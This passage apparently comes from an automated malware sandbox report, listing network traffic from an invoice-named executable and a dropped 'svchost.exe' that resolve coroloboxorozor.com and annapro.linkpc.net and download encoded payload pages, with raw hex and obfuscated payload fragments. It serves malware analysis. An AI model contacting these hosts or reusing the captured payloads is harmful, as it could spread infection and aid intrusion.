                                                                                                Feb 25, 2021 15:25:54.236260891 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.236396074 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.237449884 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.237471104 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.237534046 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.247144938 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.247170925 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.247188091 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.247208118 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.247225046 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.247241020 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.247257948 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.247270107 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.247273922 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.247293949 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.247313023 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.247319937 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.247329950 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.247347116 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.247358084 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.247417927 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.247503042 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.247577906 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.247746944 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.248969078 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.249805927 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.249834061 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.249896049 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.251409054 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.251440048 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.251528978 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.252587080 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.252613068 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.252684116 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.254038095 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.254062891 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.254149914 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.255472898 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.255498886 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.255592108 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.256964922 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.256989002 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.257042885 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.258368015 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.258400917 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.258452892 CET4975480192.168.2.3172.67.172.17
                                                                                                Feb 25, 2021 15:25:54.259784937 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.259816885 CET8049754172.67.172.17192.168.2.3
                                                                                                Feb 25, 2021 15:25:54.259864092 CET4975480192.168.2.3172.67.172.17

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Feb 25, 2021 15:25:52.848493099 CET5942053192.168.2.38.8.8.8
                                                                                                Feb 25, 2021 15:25:52.922050953 CET53594208.8.8.8192.168.2.3
                                                                                                Feb 25, 2021 15:25:53.865246058 CET5878453192.168.2.38.8.8.8
                                                                                                Feb 25, 2021 15:25:53.922323942 CET53587848.8.8.8192.168.2.3
                                                                                                Feb 25, 2021 15:26:37.244138956 CET6397853192.168.2.38.8.8.8
                                                                                                Feb 25, 2021 15:26:37.306830883 CET53639788.8.8.8192.168.2.3
                                                                                                Feb 25, 2021 15:26:39.536000967 CET6293853192.168.2.38.8.8.8
                                                                                                Feb 25, 2021 15:26:39.595065117 CET53629388.8.8.8192.168.2.3
                                                                                                Feb 25, 2021 15:26:39.691521883 CET5570853192.168.2.38.8.8.8
                                                                                                Feb 25, 2021 15:26:39.740165949 CET53557088.8.8.8192.168.2.3
                                                                                                Feb 25, 2021 15:28:08.898798943 CET5680353192.168.2.38.8.8.8
                                                                                                Feb 25, 2021 15:28:08.961497068 CET53568038.8.8.8192.168.2.3
                                                                                                Feb 25, 2021 15:28:18.106350899 CET5714553192.168.2.38.8.8.8
                                                                                                Feb 25, 2021 15:28:18.168330908 CET53571458.8.8.8192.168.2.3
                                                                                                Feb 25, 2021 15:28:47.733422995 CET5535953192.168.2.38.8.8.8
                                                                                                Feb 25, 2021 15:28:47.795389891 CET53553598.8.8.8192.168.2.3
                                                                                                Feb 25, 2021 15:28:47.985757113 CET5830653192.168.2.38.8.8.8
                                                                                                Feb 25, 2021 15:28:48.037321091 CET53583068.8.8.8192.168.2.3
                                                                                                Feb 25, 2021 15:28:48.717572927 CET6412453192.168.2.38.8.8.8
                                                                                                Feb 25, 2021 15:28:48.766532898 CET53641248.8.8.8192.168.2.3
                                                                                                Feb 25, 2021 15:29:12.670578003 CET4936153192.168.2.38.8.8.8
                                                                                                Feb 25, 2021 15:29:12.830601931 CET53493618.8.8.8192.168.2.3
                                                                                                Feb 25, 2021 15:29:40.453677893 CET6315053192.168.2.38.8.8.8
                                                                                                Feb 25, 2021 15:29:40.616316080 CET53631508.8.8.8192.168.2.3
                                                                                                Feb 25, 2021 15:30:03.380609035 CET5327953192.168.2.38.8.8.8
                                                                                                Feb 25, 2021 15:30:03.561703920 CET53532798.8.8.8192.168.2.3
                                                                                                Feb 25, 2021 15:30:32.109989882 CET5688153192.168.2.38.8.8.8
                                                                                                Feb 25, 2021 15:30:32.161513090 CET53568818.8.8.8192.168.2.3

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                Feb 25, 2021 15:25:53.865246058 CET192.168.2.38.8.8.80x6a08Standard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                                                                Feb 25, 2021 15:28:08.898798943 CET192.168.2.38.8.8.80x3d5cStandard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                                                                Feb 25, 2021 15:28:18.106350899 CET192.168.2.38.8.8.80x6144Standard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                                                                Feb 25, 2021 15:29:12.670578003 CET192.168.2.38.8.8.80x7Standard query (0)annapro.linkpc.netA (IP address)IN (0x0001)
                                                                                                Feb 25, 2021 15:29:40.453677893 CET192.168.2.38.8.8.80xf291Standard query (0)annapro.linkpc.netA (IP address)IN (0x0001)
                                                                                                Feb 25, 2021 15:30:03.380609035 CET192.168.2.38.8.8.80xac0aStandard query (0)annapro.linkpc.netA (IP address)IN (0x0001)

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                Feb 25, 2021 15:25:53.922323942 CET8.8.8.8192.168.2.30x6a08No error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                                                                Feb 25, 2021 15:25:53.922323942 CET8.8.8.8192.168.2.30x6a08No error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                                                                Feb 25, 2021 15:28:08.961497068 CET8.8.8.8192.168.2.30x3d5cNo error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                                                                Feb 25, 2021 15:28:08.961497068 CET8.8.8.8192.168.2.30x3d5cNo error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                                                                Feb 25, 2021 15:28:18.168330908 CET8.8.8.8192.168.2.30x6144No error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                                                                Feb 25, 2021 15:28:18.168330908 CET8.8.8.8192.168.2.30x6144No error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                                                                Feb 25, 2021 15:28:47.795389891 CET8.8.8.8192.168.2.30x2e26No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                Feb 25, 2021 15:29:12.830601931 CET8.8.8.8192.168.2.30x7No error (0)annapro.linkpc.net105.112.98.239A (IP address)IN (0x0001)
                                                                                                Feb 25, 2021 15:29:40.616316080 CET8.8.8.8192.168.2.30xf291No error (0)annapro.linkpc.net105.112.98.239A (IP address)IN (0x0001)
                                                                                                Feb 25, 2021 15:30:03.561703920 CET8.8.8.8192.168.2.30xac0aNo error (0)annapro.linkpc.net105.112.98.239A (IP address)IN (0x0001)

                                                                                                HTTP Request Dependency Graph

                                                                                                • coroloboxorozor.com

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                0192.168.2.349754172.67.172.1780C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Feb 25, 2021 15:25:54.012653112 CET8OUTGET /base/75FE8DBFF9B09DE6205DD213CEB478DC.html HTTP/1.1
                                                                                                Host: coroloboxorozor.com
                                                                                                Connection: Keep-Alive
                                                                                                Feb 25, 2021 15:25:54.171220064 CET9INHTTP/1.1 200 OK
                                                                                                Date: Thu, 25 Feb 2021 14:25:54 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: __cfduid=dacc9e0fe5fd276ea9c57c9884ba4993a1614263154; expires=Sat, 27-Mar-21 14:25:54 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                Last-Modified: Thu, 25 Feb 2021 01:03:10 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                cf-request-id: 087b2e0d7f00004c2cab839000000001
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=dVh6qrNtui4RX%2Bpf9ccyKXssBJbIw1oQzxrw%2FKDF0%2F7ZCcrUouCxkcNTrAV8XtO%2BBZvMkQb8rTS5MAhDNQkpyr4Q8CNjJwna3BGMrqHFhrz7l2qn"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 62721928cbf04c2c-AMS
                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                Data Raw: 36 63 63 32 0d 0a 3c 70 3e 47 47 59 4e 69 59 65 7a 7a 59 69 59 54 59 69 59 69 59 69 59 7a 59 69 59 69 59 69 59 44 79 79 59 44 79 79 59 69 59 69 59 65 51 7a 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 4c 7a 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 65 44 51 59 69 59 69 59 69 59 65 7a 59 54 65 59 65 51 4c 59 65 7a 59 69 59 65 51 69 59 4e 59 44 69 79 59 54 54 59 65 51 7a 59 65 59 47 4c 59 44 69 79 59 54 54 59 51 7a 59 65 69 7a 59 65 69 79 59 65 65 79 59 54 44 59 65 65 44 59 65 65 7a 59 65 65 65 59 65 69 54 59 65 65 7a 59 4e 47 59 65 69 4e 59 54 44 59 4e 4e 59 4e 47 59 65 65 69 59 65 65 69 59 65 65 65 59 65 65 4c 59 54 44 59 4e 51 59 65 69 65 59 54 44 59 65 65 7a 59 65 65 47 59 65 65 69 59 54 44 59 65 69 79 59 65 65 69 59 54 44 59 4c 51 59 47 4e 59 51 54 59 54 44 59 65 69 4e 59 65 65 65 59 65 69 69 59 65 69 65 59 7a 4c 59 65 54 59 65 54 59 65 69 59 54 4c 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 51 69 59 4c 4e 59 69 59 69 59 47 4c 59 65 59 54 59 69 59 47 4c 59 65 7a 44 59 7a 65 59 65 51 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 44 44 7a 59 69 59 54 7a 59 69 59 65 65 59 65 59 51 69 59 69 59 69 59 51 51 59 65 69 59 69 59 69 59 4c 59 69 59 69 59 69 59 69 59 69 59 69 59 44
                                                                                                Data Ascii: 6cc2<p>GGYNiYezzYiYTYiYiYiYzYiYiYiYDyyYDyyYiYiYeQzYiYiYiYiYiYiYiYLzYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYeDQYiYiYiYezYTeYeQLYezYiYeQiYNYDiyYTTYeQzYeYGLYDiyYTTYQzYeizYeiyYeeyYTDYeeDYeezYeeeYeiTYeezYNGYeiNYTDYNNYNGYeeiYeeiYeeeYeeLYTDYNQYeieYTDYeezYeeGYeeiYTDYeiyYeeiYTDYLQYGNYQTYTDYeiNYeeeYeiiYeieYzLYeTYeTYeiYTLYiYiYiYiYiYiYiYQiYLNYiYiYGLYeYTYiYGLYezDYzeYeQiYiYiYiYiYiYiYiYiYDDzYiYTzYiYeeYeYQiYiYiYQQYeiYiYiYLYiYiYiYiYiYiYD
                                                                                                Feb 25, 2021 15:25:57.303025007 CET1071OUTGET /base/D8145E38A6AEE16C4C80E6936C9A6886.html HTTP/1.1
                                                                                                Host: coroloboxorozor.com
                                                                                                Feb 25, 2021 15:26:00.460356951 CET1072INHTTP/1.1 200 OK
                                                                                                Date: Thu, 25 Feb 2021 14:26:00 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: __cfduid=d937ac7e07512f2c492c1cafab41b4d541614263157; expires=Sat, 27-Mar-21 14:25:57 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                last-modified: Thu, 25 Feb 2021 01:03:13 GMT
                                                                                                vary: Accept-Encoding
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                cf-request-id: 087b2e1a5a00004c2c57b2a000000001
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=7Qzt9Y66xhcfgz3z3sOyGUNglgaZlRZV0PHwyPps10C%2B2ZnQRMdOQzPMlr9A17ofyHN6MSgVKnAQMITUFQyU74UuP8FCoPGcvTGnbwA6qXd%2Fuoi5"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 6272193d5ece4c2c-AMS
                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                Data Raw: 33 32 36 37 0d 0a 3c 70 3e 59 65 4c 4e 59 44 54 54 59 4e 7a 59 44 4e 59 65 54 69 59 65 69 59 44 44 7a 59 44 69 54 59 4e 4e 59 79 54 59 65 54 4c 59 65 47 79 59 65 44 54 59 51 69 59 65 44 51 59 44 65 7a 59 65 4e 65 59 44 7a 4e 59 44 79 7a 59 65 4c 47 59 79 69 59 79 7a 59 65 7a 69 59 44 47 59 44 44 4e 59 47 47 59 65 79 47 59 44 65 79 59 65 69 51 59 65 54 4c 59 44 65 65 59 65 65 69 59 44 7a 47 59 47 65 59 7a 65 59 44 54 79 59 7a 7a 59 65 7a 47 59 65 54 47 59 65 51 47 59 51 7a 59 65 65 4c 59 47 4c 59 65 7a 44 59 51 4c 59 47 79 59 65 79 69 59 47 51 59 65 7a 4c 59 51 54 59 44 7a 69 59 69 59 65 69 65 59 51 51 59 65 4c 4c 59 69 59 65 7a 4e 59 4e 7a 59 51 54 59 65 79 47 59 7a 79 59 65 4e 69 59 65 4e 79 59 65 59 44 54 51 59 44 7a 44 59 7a 4c 59 65 4c 69 59 65 54 69 59 54 79 59 44 44 44 59 65 4c 44 59 65 69 69 59 65 44 51 59 44 7a 79 59 47 54 59 44 44 59 44 44 44 59 65 54 4e 59 65 47 69 59 4c 7a 59 65 7a 54 59 65 4c 51 59 44 69 47 59 44 65 65 59 44 7a 4c 59 65 65 69 59 65 79 44 59 44 7a 54 59 44 44 4e 59 54 79 59 65 44 79 59 47 4e 59 47 69 59 44 69 4c 59 47 44 59 54 54 59 65 44 59 65 51 54 59 47 4e 59 65 4c 79 59 65 44 79 59 79 65 59 65 4e 4c 59 44 69 69 59 65 47 79 59 65 51 47 59 65 65 69 59 65 47 65 59 51 69 59 7a 54 59 65 47 79 59 65 47 59 65 7a 51 59 65 79 65 59 47 4c 59 54 4c 59 79 69 59 44 69 44 59 4e 54 59 65 4e 54 59 51 7a 59 65 54 69 59 65 44 79 59 4e 47 59 65 4c
                                                                                                Data Ascii: 3267<p>YeLNYDTTYNzYDNYeTiYeiYDDzYDiTYNNYyTYeTLYeGyYeDTYQiYeDQYDezYeNeYDzNYDyzYeLGYyiYyzYeziYDGYDDNYGGYeyGYDeyYeiQYeTLYDeeYeeiYDzGYGeYzeYDTyYzzYezGYeTGYeQGYQzYeeLYGLYezDYQLYGyYeyiYGQYezLYQTYDziYiYeieYQQYeLLYiYezNYNzYQTYeyGYzyYeNiYeNyYeYDTQYDzDYzLYeLiYeTiYTyYDDDYeLDYeiiYeDQYDzyYGTYDDYDDDYeTNYeGiYLzYezTYeLQYDiGYDeeYDzLYeeiYeyDYDzTYDDNYTyYeDyYGNYGiYDiLYGDYTTYeDYeQTYGNYeLyYeDyYyeYeNLYDiiYeGyYeQGYeeiYeGeYQiYzTYeGyYeGYezQYeyeYGLYTLYyiYDiDYNTYeNTYQzYeTiYeDyYNGYeL


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                1192.168.2.349758104.21.71.23080C:\Users\Public\Documents\RiXHGNhjF\svchost.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Feb 25, 2021 15:28:09.078180075 CET2207OUTGET /base/75FE8DBFF9B09DE6205DD213CEB478DC.html HTTP/1.1
                                                                                                Host: coroloboxorozor.com
                                                                                                Connection: Keep-Alive
                                                                                                Feb 25, 2021 15:28:09.158781052 CET2208INHTTP/1.1 200 OK
                                                                                                Date: Thu, 25 Feb 2021 14:28:09 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: __cfduid=d34aabc5e9377dcf84a72875c10e73f6c1614263289; expires=Sat, 27-Mar-21 14:28:09 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                Last-Modified: Thu, 25 Feb 2021 01:03:10 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                cf-request-id: 087b301d1b00000b3f623ef000000001
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=UCU1vPyxYPAgytMdyoVOuR7o1dyUi%2BhaPbMuxmQzCheiz4MFBMm4q56V1ljM7eWqKmHugwNmeYQUfjdZll%2Bw34%2FshzmkyjoERrAOSI3pqEmPjw4O"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 62721c74fa1d0b3f-AMS
                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                Data Raw: 65 31 66 0d 0a 3c 70 3e 47 47 59 4e 69 59 65 7a 7a 59 69 59 54 59 69 59 69 59 69 59 7a 59 69 59 69 59 69 59 44 79 79 59 44 79 79 59 69 59 69 59 65 51 7a 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 4c 7a 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 65 44 51 59 69 59 69 59 69 59 65 7a 59 54 65 59 65 51 4c 59 65 7a 59 69 59 65 51 69 59 4e 59 44 69 79 59 54 54 59 65 51 7a 59 65 59 47 4c 59 44 69 79 59 54 54 59 51 7a 59 65 69 7a 59 65 69 79 59 65 65 79 59 54 44 59 65 65 44 59 65 65 7a 59 65 65 65 59 65 69 54 59 65 65 7a 59 4e 47 59 65 69 4e 59 54 44 59 4e 4e 59 4e 47 59 65 65 69 59 65 65 69 59 65 65 65 59 65 65 4c 59 54 44 59 4e 51 59 65 69 65 59 54 44 59 65 65 7a 59 65 65 47 59 65 65 69 59 54 44 59 65 69 79 59 65 65 69 59 54 44 59 4c 51 59 47 4e 59 51 54 59 54 44 59 65 69 4e 59 65 65 65 59 65 69 69 59 65 69 65 59 7a 4c 59 65 54 59 65 54 59 65 69 59 54 4c 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 51 69 59 4c 4e 59 69 59 69 59 47 4c 59 65 59 54 59 69 59 47 4c 59 65 7a 44 59 7a 65 59 65 51 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 69 59 44 44 7a 59 69 59 54 7a 59 69 59 65 65 59 65 59 51 69 59 69 59 69 59 51 51 59 65 69 59 69 59 69 59 4c 59 69 59 69 59 69 59 69 59 69 59 69 59 44 79 7a 59
                                                                                                Data Ascii: e1f<p>GGYNiYezzYiYTYiYiYiYzYiYiYiYDyyYDyyYiYiYeQzYiYiYiYiYiYiYiYLzYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYiYeDQYiYiYiYezYTeYeQLYezYiYeQiYNYDiyYTTYeQzYeYGLYDiyYTTYQzYeizYeiyYeeyYTDYeeDYeezYeeeYeiTYeezYNGYeiNYTDYNNYNGYeeiYeeiYeeeYeeLYTDYNQYeieYTDYeezYeeGYeeiYTDYeiyYeeiYTDYLQYGNYQTYTDYeiNYeeeYeiiYeieYzLYeTYeTYeiYTLYiYiYiYiYiYiYiYQiYLNYiYiYGLYeYTYiYGLYezDYzeYeQiYiYiYiYiYiYiYiYiYDDzYiYTzYiYeeYeYQiYiYiYQQYeiYiYiYLYiYiYiYiYiYiYDyzY
                                                                                                Feb 25, 2021 15:28:09.621206045 CET3270OUTGET /base/D8145E38A6AEE16C4C80E6936C9A6886.html HTTP/1.1
                                                                                                Host: coroloboxorozor.com
                                                                                                Feb 25, 2021 15:28:09.690470934 CET3271INHTTP/1.1 200 OK
                                                                                                Date: Thu, 25 Feb 2021 14:28:09 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: __cfduid=d34aabc5e9377dcf84a72875c10e73f6c1614263289; expires=Sat, 27-Mar-21 14:28:09 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                Last-Modified: Thu, 25 Feb 2021 01:03:13 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                cf-request-id: 087b301f3800000b3fca383000000001
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3T7vWBNKs84uNdAuleExeWWt55AZP7du73GI9T8Wt59O3HPC1J4iMk5p2cVswqedB01AhXoS2kQVMFVJBCKKTPueyPFqrlhlEbFkJ6xoWgbnxxGl"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 62721c7859430b3f-AMS
                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                Data Raw: 35 39 31 34 0d 0a 3c 70 3e 59 65 4c 4e 59 44 54 54 59 4e 7a 59 44 4e 59 65 54 69 59 65 69 59 44 44 7a 59 44 69 54 59 4e 4e 59 79 54 59 65 54 4c 59 65 47 79 59 65 44 54 59 51 69 59 65 44 51 59 44 65 7a 59 65 4e 65 59 44 7a 4e 59 44 79 7a 59 65 4c 47 59 79 69 59 79 7a 59 65 7a 69 59 44 47 59 44 44 4e 59 47 47 59 65 79 47 59 44 65 79 59 65 69 51 59 65 54 4c 59 44 65 65 59 65 65 69 59 44 7a 47 59 47 65 59 7a 65 59 44 54 79 59 7a 7a 59 65 7a 47 59 65 54 47 59 65 51 47 59 51 7a 59 65 65 4c 59 47 4c 59 65 7a 44 59 51 4c 59 47 79 59 65 79 69 59 47 51 59 65 7a 4c 59 51 54 59 44 7a 69 59 69 59 65 69 65 59 51 51 59 65 4c 4c 59 69 59 65 7a 4e 59 4e 7a 59 51 54 59 65 79 47 59 7a 79 59 65 4e 69 59 65 4e 79 59 65 59 44 54 51 59 44 7a 44 59 7a 4c 59 65 4c 69 59 65 54 69 59 54 79 59 44 44 44 59 65 4c 44 59 65 69 69 59 65 44 51 59 44 7a 79 59 47 54 59 44 44 59 44 44 44 59 65 54 4e 59 65 47 69 59 4c 7a 59 65 7a 54 59 65 4c 51 59 44 69 47 59 44 65 65 59 44 7a 4c 59 65 65 69 59 65 79 44 59 44 7a 54 59 44 44 4e 59 54 79 59 65 44 79 59 47 4e 59 47 69 59 44 69 4c 59 47 44 59 54 54 59 65 44 59 65 51 54 59 47 4e 59 65 4c 79 59 65 44 79 59 79 65 59 65 4e 4c 59 44 69 69 59 65 47 79 59 65 51 47 59 65 65 69 59 65 47 65 59 51 69 59 7a 54 59 65 47 79 59 65 47 59 65 7a 51 59 65 79 65 59 47 4c 59 54 4c 59 79 69 59 44 69 44 59 4e 54 59 65 4e 54 59 51 7a 59 65 54 69 59 65 44 79 59 4e 47 59 65 4c 59 4c 44 59
                                                                                                Data Ascii: 5914<p>YeLNYDTTYNzYDNYeTiYeiYDDzYDiTYNNYyTYeTLYeGyYeDTYQiYeDQYDezYeNeYDzNYDyzYeLGYyiYyzYeziYDGYDDNYGGYeyGYDeyYeiQYeTLYDeeYeeiYDzGYGeYzeYDTyYzzYezGYeTGYeQGYQzYeeLYGLYezDYQLYGyYeyiYGQYezLYQTYDziYiYeieYQQYeLLYiYezNYNzYQTYeyGYzyYeNiYeNyYeYDTQYDzDYzLYeLiYeTiYTyYDDDYeLDYeiiYeDQYDzyYGTYDDYDDDYeTNYeGiYLzYezTYeLQYDiGYDeeYDzLYeeiYeyDYDzTYDDNYTyYeDyYGNYGiYDiLYGDYTTYeDYeQTYGNYeLyYeDyYyeYeNLYDiiYeGyYeQGYeeiYeGeYQiYzTYeGyYeGYezQYeyeYGLYTLYyiYDiDYNTYeNTYQzYeTiYeDyYNGYeLYLDY


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                2192.168.2.349760172.67.172.1780C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                Feb 25, 2021 15:28:18.300697088 CET4328OUTGET /base/75FE8DBFF9B09DE6205DD213CEB478DC.html HTTP/1.1
                                                                                                Host: coroloboxorozor.com
                                                                                                Connection: Keep-Alive
                                                                                                Feb 25, 2021 15:28:18.402945995 CET4330INHTTP/1.1 200 OK
                                                                                                Date: Thu, 25 Feb 2021 14:28:18 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: __cfduid=db1090b58def6d6c36e4322e395959ae21614263298; expires=Sat, 27-Mar-21 14:28:18 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                Last-Modified: Thu, 25 Feb 2021 01:03:10 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                cf-request-id: 087b30411f0000733b29182000000001
